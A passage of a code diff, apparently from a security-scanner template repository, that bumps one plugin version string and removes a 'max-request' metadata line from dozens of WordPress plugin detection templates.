--- a/helpers/wordpress/plugins/the-events-calendar.txt
+++ b/helpers/wordpress/plugins/the-events-calendar.txt
@@ -1 +1 @@
-6.1.2.1
\ No newline at end of file
+6.1.2.2
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
- max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
- max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
- max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
- max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index 06cfd4950b..97f1d8c18f 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
- max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
- max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
- max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
- max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
- max-request: 1
plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
- max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
- max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
- max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
- max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
- max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
- max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
- max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
- max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
- max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
- max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
- max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
- max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
- max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
- max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml
index 425adf0bfe..e555bf93d3 100644
--- a/http/technologies/wordpress/plugins/cloudflare.yaml
+++ b/http/technologies/wordpress/plugins/cloudflare.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cloudflare/
metadata:
- max-request: 1
plugin_namespace: cloudflare
wpscan: https://wpscan.com/plugin/cloudflare
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
- max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
- max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
- max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
- max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
- max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
- max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
- max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
- max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
- max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
- max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
- max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
- max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
- max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index d6200aaea4..814e603d75 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
- max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
- max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
- max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
- max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
- max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
- max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
- max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
- max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
- max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
index 96c813ad49..c9859e9770 100644
--- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml
+++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-google-fonts/
metadata:
- max-request: 1
plugin_namespace: easy-google-fonts
wpscan: https://wpscan.com/plugin/easy-google-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
- max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
- max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
- max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
- max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
- max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
- max-request: 1
plugin_namespace: envato-elements
